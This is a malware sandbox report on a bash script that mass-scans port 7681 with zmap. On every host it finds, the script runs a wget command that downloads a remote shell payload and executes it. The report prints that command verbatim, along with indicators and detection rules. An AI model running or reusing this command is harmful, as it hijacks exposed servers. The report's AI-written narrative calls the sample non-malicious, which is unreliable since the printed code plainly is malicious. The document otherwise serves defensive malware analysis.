Malicious
80/100
10 points past the malicious line at 70.
Why this verdict
- MalwareBazaar known sample
- Known malicious hash (feed): urlhaus: malware payload (sh)
Analysis layers
Malware family
0 independent sourcesNamed by a single source. Treat it as a lead rather than a classification.
| Layer | Source | What it matched |
|---|---|---|
| hash_feed | rule corpus | urlhaus: malware payload (sh) |
Structure
What the file is made of: headers, imports, how it was built and whether it was signed.
Sections & resources
How the file is laid out in memory, and what is embedded in it: section roles, access rights, entropy and every resource entry.
Signatures & packing
What matched and what is hidden: YARA rules, capa capabilities, family attribution, packer detection, unpacked payloads and recovered configuration.
Strings
The readable content: embedded secrets, flagged strings and everything extraction recovered.
Code
What the sample would execute: the emulated API call sequence, and the disassembled entry point.
Packer detection looks at a program's entry point, sections and entropy. This file is not a program image, so there was nothing of that kind to assess.
File content
11 lines · 338 bytesThe sample verbatim, shown as inert text - nothing here is interpreted by this page.
#!/bin/bash
commands=(
'ulimit -n 999999;ulimit -u999999; zmap -p 7681 -r 0 -B 20G | go run ttyd.go --cmd "wget http://aura.tcplegit.space/download_and_run.sh -O /tmp/.x; chmod 777 /tmp/.x; /tmp/.x" -workers 99999'
)
for cmd in "${commands[@]}"; do
echo "Running command: $cmd"
eval "$cmd"
echo "Command finished"
done
Extracted strings
showing 5- commands=(
- 'ulimit -n 999999;ulimit -u999999; zmap -p 7681 -r 0 -B 20G | go run ttyd.go --cmd "wget http://aura.tcplegit.space/download_and_run.sh -O /tmp/.x; chmod 777 /tmp/.x; /tmp/.x" -workers 99999'
- echo "Running command: $cmd"
- echo "Command finished"
- done
No strings match this filter.
Stack and decoded strings were not recovered: this file format is not eligible for string emulation. Only literal strings present in the file are listed above.
Nothing in this view
This sample produced no results for this part of the static analysis.
VM console
headless guestThe Linux sandbox runs a server image with no desktop, so there is no screen to record - this is the boot console, kept because a kernel panic or an out-of-memory kill would show up here and in no other layer. What the sample did is under Behavior, File & registry and Network, captured from the syscall trace rather than from pixels.
Behavior summary
2 process(es) observed
MITRE ATT&CK
2 techniquesSyscall summary
top calls| brk | 3 |
|---|---|
| mmap | 14 |
| clone | 1 |
| wait4 | 1 |
| access | 1 |
| execve | 1 |
| getcwd | 1 |
| munmap | 1 |
| openat | 16 |
| socket | 2 |
| connect | 2 |
| mprotect | 4 |
| exit_group | 3 |
| newfstatat | 4 |
| rt_sigaction | 20 |
| rt_sigreturn | 1 |
| rt_sigprocmask | 15 |
Persistence & evasion
No persistence or evasion behavior observed.
No network activity - the run was isolated
This detonation was given no internet connection, so a sample that wanted to reach out could not. An empty section here says nothing about whether it tried.
Process tree
What ran during the detonation, and what each process did. Select a node to see the activity attributed to it.
scan.sh
2 processesAttributed activity
Established mechanisms
cleanNo persistence established
None of the 90 auto-start methods below were established during this run.
Detection coverage
0 / 90Every auto-start method checked on this sample, grouped by family. A method with no result is reported clean.
- Active Setup Installed Component T1547.014 clean
- Explorer Delay-Load Object T1547.001 clean
- Explorer Run Key T1547.001 clean
- Explorer SharedTaskScheduler T1547.001 clean
- Group Policy Extension DLL T1547.004 clean
- Group Policy Run Key T1547.001 clean
- Logon Script T1037.001 clean
- RDP WDS Startup Program T1547.001 clean
- Registry Run Key T1547.001 clean
- Registry RunEx Key T1547.001 clean
- Registry RunOnce Key T1547.001 clean
- Registry RunOnceEx Key T1547.001 clean
- Registry RunServices Key T1547.001 clean
- Startup Folder Item T1547.001 clean
- Startup Folder Redirection T1547.001 clean
- Terminal Services Initial Program T1547.001 clean
- Winlogon GINA DLL T1547.004 clean
- Winlogon MPNotify Value T1547.004 clean
- Winlogon Notify Package T1547.004 clean
- Winlogon Shell Value T1547.004 clean
- Winlogon Taskman Value T1547.004 clean
- Winlogon Userinit Value T1547.004 clean
- BITS Job T1197 clean
- Print Monitor DLL T1547.010 clean
- Print Processor DLL T1547.012 clean
- Scheduled Task T1053.005 clean
- Scheduled Task Registry Implant T1053.005 clean
- Service Control Manager Security Descriptor T1574.011 clean
- Service DLL Hijack T1543.003 clean
- Time Provider DLL T1547.003 clean
- Windows Service Creation T1543.003 clean
- .NET Managed Debugger T1546.012 clean
- Accessibility Tool Hijack T1546.008 clean
- AeDebug Postmortem Debugger T1546.012 clean
- App Paths Hijack T1546.012 clean
- Application Shim Database T1546.011 clean
- Boot Verification Program T1547.002 clean
- Command Processor AutoRun T1546.011 clean
- Explorer Load Value T1547.001 clean
- Explorer MyComputer Tool Hijack T1546.001 clean
- Registry Image File Execution Options T1546.012 clean
- Screensaver Hijack T1546.002 clean
- Setup ErrorHandler Script T1546 clean
- Shell Open Command Hijack T1546.001 clean
- SilentProcessExit Monitor T1546.012 clean
- Telemetry Controller Command T1546.015 clean
- WER ReflectDebugger T1546.012 clean
- Windows Error Reporting Debugger T1546.012 clean
- .NET CLR Profiler DLL T1574.012 clean
- .NET Startup Hook DLL T1574 clean
- AppCert DLLs T1546.009 clean
- AppInit DLLs T1546.010 clean
- AutodialDLL Winsock Injection T1546.006 clean
- DLL Search-Order Hijack T1574.001 T1574.002 clean
- DNS Server Plugin DLL T1574.001 clean
- HTML Help Helper DLL T1546 clean
- KnownDLLs Manipulation T1574.001 clean
- Natural Language Platform DLL Override T1546 clean
- Netsh Helper DLL T1546.007 clean
- Winsock Layered Service Provider T1546.006 clean
- Browser Extension T1176 clean
- Browser Helper Object T1176 clean
- COM Server Hijack T1546.015 clean
- HTML Help COM Object Hijack T1546.015 clean
- Shell Context Menu Handler T1546.001 clean
- Shell Extension Handler T1546.001 clean
- Account RID Hijack T1098 clean
- AMSI Provider T1562.001 clean
- Credential Provider T1547.014 clean
- DSRM Admin Logon Backdoor T1556 clean
- Hidden Local Account T1136.001 clean
- LSA Authentication Package T1547.002 clean
- LSA Extension DLL T1547.005 clean
- LSA Notification Package T1547.005 clean
- LSA Security Package T1547.005 clean
- Network Provider DLL T1556.008 clean
- Security Support Provider T1547.005 clean
- Netsh Port Proxy T1090.001 clean
- Office Add-in T1137.006 clean
- Office Executable Sideload T1574.002 clean
- Office Startup Template T1137.001 clean
- Office Test Key T1137.002 clean
- Power Automate Flow T1546 clean
- PowerShell Profile T1546.013 clean
- Windows Terminal Startup Action T1546 clean
- WMI Event Subscription T1546.003 clean
- BootExecute Native Image T1547.002 clean
- PlatformExecute Native Image T1547.002 clean
- SetupExecute Native Image T1547.002 clean
- UEFI / Bootkit Artifact T1542.003 T1542.001 clean
File activity summary
File & registry ops
16 file · 0 registry · sample scope
| Operation | Target | Process | |
|---|---|---|---|
| read |
/etc/ld.so.cache
|
- pid 681 | 22:10:22.299148 |
| read |
/lib/x86_64-linux-gnu/libtinfo.so.6
|
- pid 681 | 22:10:22.300033 |
| read |
/lib/x86_64-linux-gnu/libc.so.6
|
- pid 681 | 22:10:22.300535 |
| write |
/dev/tty
|
- pid 681 | 22:10:22.303757 |
| read |
/usr/lib/locale/locale-archive
|
- pid 681 | 22:10:22.308131 |
| read |
/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
|
- pid 681 | 22:10:22.309127 |
| read |
/etc/nsswitch.conf
|
- pid 681 | 22:10:22.326721 |
| read |
/etc/passwd
|
- pid 681 | 22:10:22.328521 |
| read |
/var/tmp/scan.sh
|
- pid 681 | 22:10:22.338114 |
| read |
/usr/share/locale/locale.alias
|
- pid 683 | 22:10:22.361039 |
| read |
/usr/share/locale/en_US.UTF-8/LC_MESSAGES/bash.mo
|
- pid 682 | 22:10:22.361531 |
| read |
/usr/share/locale/en_US.utf8/LC_MESSAGES/bash.mo
|
- pid 682 | 22:10:22.361988 |
| read |
/usr/share/locale/en_US/LC_MESSAGES/bash.mo
|
- pid 682 | 22:10:22.362315 |
| read |
/usr/share/locale-langpack/en.UTF-8/LC_MESSAGES/bash.mo
|
- pid 683 | 22:10:22.366451 |
| read |
/usr/share/locale-langpack/en.utf8/LC_MESSAGES/bash.mo
|
- pid 683 | 22:10:22.366938 |
| read |
/usr/share/locale-langpack/en/LC_MESSAGES/bash.mo
|
- pid 683 | 22:10:22.367386 |
No operations match your filter.
File reputation
2 of 7 listed| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| MalwareBazaar | File hash | known sample | sh | live lookup |
| URLhaus payload hashes | File hash | listed | urlhaus: malware payload (sh) | 1,474 records 6 minutes ago |
| VirusTotal | File hash | cannot access | rate limited (free-tier quota) | live lookup |
| filescan.io | File hash | no detections | - | live lookup |
| MalwareBazaar hash feed | File hash | clean | not in feed | 2,535 records 6 minutes ago |
| MalwareBazaar ransomware feed | File hash | clean | not in feed | 8,271 records 4 hours ago |
| ThreatFox hash IOCs | File hash | clean | not in feed | 1,632 records 6 minutes ago |
Hash lookups only - the sample itself is never uploaded to any third party.
Network indicators
1 of 8 listed| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| URLhaus | IP / domain / URL | 2 indicators | hxxp[://]aura[.]tcplegit[.]space/download_and_run[.]sh, hxxp[://]aura… | 5,155 records 6 minutes ago |
| blocklist.de | IP / domain / URL | clean | 1 observed indicator, none listed | 24.5k records 6 minutes ago |
| CINS Army | IP / domain / URL | clean | 1 observed indicator, none listed | 15k records 6 minutes ago |
| Emerging Threats | IP / domain / URL | clean | 1 observed indicator, none listed | 580 records 6 minutes ago |
| Feodo Tracker | IP / domain / URL | clean | 1 observed indicator, none listed | 5 records 6 minutes ago |
| IPsum | IP / domain / URL | clean | 1 observed indicator, none listed | 17.7k records 6 minutes ago |
| Phishing.Database | IP / domain / URL | clean | 1 observed indicator, none listed | 391.1k records 4 hours ago |
| ThreatFox | IP / domain / URL | clean | 1 observed indicator, none listed | 1,632 records 6 minutes ago |
TLS fingerprints
0 clear| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| abuse.ch JA3 blocklist | JA3 / JA4 | not checked | no TLS client fingerprint observed | 97 records 16 hours ago |
| SSL blocklist | JA3 / JA4 | not checked | no TLS client fingerprint observed | 10.7k records 6 minutes ago |
Detection rules
2 clear| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| Sigma rules | Behavior log | clean | - | 2,275 records 22 hours ago |
| YARA rules | Sample content | clean | no rule matched | 110 records 7 minutes ago |
Tooling catalogs
4 clear| Source | Checks | Result | Detail | Feed |
|---|---|---|---|---|
| LOLBAS | Process image paths | clean | 1 process image path, none masqueraded | 244 records 7 minutes ago |
| LOLBootloaders | File hash | clean | not a known vulnerable bootloader | 520 records 6 minutes ago |
| LOLDrivers | File hash | clean | not a known vulnerable driver | 2,306 records 6 minutes ago |
| LOLRMM | Names and domains | clean | 2 name/domain indicators checked, no remote-management tooling | 322 records 6 minutes ago |
IOC reputation
URLhaus / ThreatFox| Indicator | Source | Threat |
|---|---|---|
| hxxp[://]aura[.]tcplegit[.]space/download_and_run[.]sh | URLhaus | malware_download |
Analyst narrative
The analysis of the sample indicates that it was executed successfully in the sandbox environment. The following kill-chain elements were observed: 1. **Initial Access**: The sample appears to be associated with a URL (hxxp://aura.tcplegit.space/download_and_run.sh), suggesting a potential method of initial access through a web-based delivery mechanism. 2. **Execution**: The sample executed a script named `scan.sh`, which was spawned as a process (PID 681). The execution involved various system calls, including `execve`, indicating that it invoked a command or script. 3. **Persistence**: There were no indications of persistence mechanisms observed during the analysis, as no registry operations or file drops were recorded. 4. **Defense Evasion**: The sample did not exhibit any specific behaviors aimed at evading detection, as no evasion signals were noted. 5. **Command and Control (C2)**: There were no network connections established during the execution, indicating a lack of observable command and control activity. 6. **Impact**: The behavior summary does not provide evidence of any harmful impact on the system, as the operations primarily involved reading system files and executing a script without any apparent malicious actions. In conclusion, while the sample executed and displayed some capabilities, the lack of persistence, C2 activity, and observable impact leads to a neutral assessment. The sample does not appear to exhibit malicious behavior based on the available evidence.
Evasion analysis
No evasive checkpoints detected.
Network indicators
1| Severity | Type | Indicator | Description |
|---|---|---|---|
| info | url | http://aura.tcplegit.space/download_and_run.sh | Extracted from the sample's strings |
File indicators
2| Severity | Type | Indicator | Description |
|---|---|---|---|
| malicious | sample_sha256 | 29613d1dbf180223f502151ea17098145c71326ce109fb38d103035579e81858 | Submitted sample (SHA256) |
| malicious | sample_md5 | e5f17a12d10fe67a27c6bb48e625a9e9 | Submitted sample (MD5) |
MITRE ATT&CK
2 techniquesSigma detections
0 matches of 2275 rulesThe Sigma corpus was evaluated against this run's processes, registry, file, network, DNS and script activity. Nothing matched.
Generated rules
Suricata/Snort: auto_file_2385_suricata
Auto-generatedalert http any any -> any any (msg:"sandbox auto scan 2385 C2 URL"; http.uri; content:"/download_and_run.sh"; sid:15978048; rev:1;)
YARA: auto_file_2385_yara
Auto-generatedrule auto_file_2385_yara
{
meta:
description = "Auto-generated from scan 2385"
author = "sandbox auto-generator"
anchors = "3 independent regions"
strings:
$s0 = "commands=(" ascii fullword
$s1 = "echo \"Running command: $cmd\"" ascii fullword
$s2 = "echo \"Command finished\"" ascii fullword
condition:
filesize < 65536 and all of them
}Extracted files
What came out of the sample: unpacked payloads, carved objects and captured memory. Each one is stored by content hash, so the same object extracted twice is the same row.
No extracted files
Nothing was unpacked or carved out of this sample. Packed samples, documents with embedded objects and installers are the ones that usually produce artifacts here.
Export & download
/s/2385The report downloads - PCAP and the SIEM/TIP exports - are a paid-plan feature. Sign in with a paid plan to export this report.
AI analysis report
An enterprise report with an AI-written executive summary, threat assessment, kill chain, and recommendations, plus the derived evidence (verdict, MITRE ATT&CK, network, file modifications, dropped files, IOCs) and screenshots. The AI narrative is built from derived analysis data only, so the raw sample never leaves the host (no-upload and AI-boundary preserved).
Headers
Body
Headers
Body
You are about to download the raw, live sample. It is real, potentially destructive malware and can harm your machine if opened or run. Only handle it inside an isolated analysis environment.
Delivered as a ZIP encrypted with the password infected so the bytes are never handled unprotected.
Report this analysis
Analysis reports are produced automatically from files, addresses and text submitted by visitors. If this one publishes your material, identifies you, or should not be public for any other reason, tell us why and an administrator will review it.
Public analyses of this file
1 run| Submitted | Environment | Verdict | Score |
|---|---|---|---|
| 2026-09-07 21:45 Shown below | Static analysis | Malicious | 80/100 |